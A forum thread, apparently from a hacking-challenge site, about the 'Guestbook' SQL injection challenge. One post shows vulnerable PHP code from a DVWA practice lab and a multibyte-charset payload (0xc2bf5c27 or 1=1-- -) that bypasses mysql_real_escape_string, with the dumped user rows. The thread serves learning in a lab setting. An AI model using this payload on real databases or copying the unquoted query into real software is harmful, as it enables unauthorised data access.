Username: 
Password: 
Restrict session to IP 

The Guesbook  Go to the The Guestbook challenge

1 2
Global Rank: 5
Totalscore: 550226
Posts: 225
Thanks: 232
UpVotes: 233
Registered: 15y 68d






Last Seen: 14h 8m
The User is Offline
RE: The Guesbook
Google/translate3Thank You!3Good Post!1Bad Post! link
Another game of "spot the error"... Nice distraction with the indentation. ;)
You're not sending the full request to the server.
Try reformatting your code.
line 14
echo $out1
You're a busy clicker Drool


You might also run into problems with checking eof in combination with HTTP/1.1, because the connection isn't closed immediately.
Last edited by tehron - Mar 06, 2012 - 13:23:15
Global Rank: 227
Totalscore: 94360
Posts: 1684
Thanks: 1360
UpVotes: 920
Registered: 16y 314d




Last Seen: 1d 11h
The User is Offline
RE: The Guesbook
Google/translate1Thank You!1Good Post!0Bad Post! link
Nice post, tehron.

I can see the error you have spotted now as well, and i actually looked for these myself, but it had to be in the last concat of course, when eyes are lazy.

Cheers!
The geeks shall inherit the properties and methods of object earth.
Global Rank: 15642
Totalscore: 83
Posts: 3
Thanks: 1
UpVotes: 0
Registered: 11y 227d
Last Seen: 11y 67d
The User is Offline
RE: The Guesbook
Google/translate0Thank You!0Good Post!0Bad Post! link
Hi Gizmore, I am able to bypass the mysql_escape_string() in my simulation lab (based on DVWA), encoding the '\' but can't bypass your guesbook with the same injection...Can you give us some hint?
Thanks in advance.
Global Rank: 227
Totalscore: 94360
Posts: 1684
Thanks: 1360
UpVotes: 920
Registered: 16y 314d




Last Seen: 1d 11h
The User is Offline
RE: The Guesbook
Google/translate0Thank You!0Good Post!0Bad Post! link
Maybe give us a hint how to bypass mysql_real_escape_string nowadays Euh

I call "impossibru"!

Smile
The geeks shall inherit the properties and methods of object earth.
Global Rank: 15642
Totalscore: 83
Posts: 3
Thanks: 1
UpVotes: 0
Registered: 11y 227d
Last Seen: 11y 67d
The User is Offline
RE: The Guesbook
Google/translate0Thank You!0Good Post!0Bad Post! link
As I said, in DVWA (mysql 5.5):
Code behind:
$id = trim($_GET['id']);
$id = mysql_real_escape_string($id);
$getid = "SELECT first_name, last_name FROM users WHERE user_id = $id";
$result = mysql_query($getid); // Removed 'or die' to suppres mysql errors


Injection chain ID: 0xc2bf5c27 or 1=1-- - (i.e. ¿\' or 1=1-- -, though also works without the ' (0x27)

Results:
ID: char(0xc2bf5c27) or 1=1-- -
First name: admin
Surname: admin

ID: char(0xc2bf5c27) or 1=1-- -
First name: Gordon
Surname: Brown

ID: char(0xc2bf5c27) or 1=1-- -
First name: Hack
Surname: Me

ID: char(0xc2bf5c27) or 1=1-- -
First name: Pablo
Surname: Picasso

ID: char(0xc2bf5c27) or 1=1-- -
First name: Bob
Surname: Smith

I am a bit confused about this challenge (I also have been considering a cookie injection but..)
Thanks Smile
Global Rank: 227
Totalscore: 94360
Posts: 1684
Thanks: 1360
UpVotes: 920
Registered: 16y 314d




Last Seen: 1d 11h
The User is Offline
RE: The Guesbook
Google/translate0Thank You!0Good Post!0Bad Post! link
Maybe you should take a look at the challenge's code Smile
The geeks shall inherit the properties and methods of object earth.
1 2
jacobs, Redknee, tunelko, silenttrack, n0tHappy, nonfungiblesecurity, quangntenemy, TheHiveMind, Z, balicocat, Ge0, samuraiblanco, arraez, jcquinterov, hophuocthinh, alfamen2, burhanudinn123, Ben_Dover, stephanduran89, braddie0, SwolloW, dangarbri, csuquvq have subscribed to this thread and receive emails on new posts.
1 people are watching the thread at the moment.
This thread has been viewed 186577 times.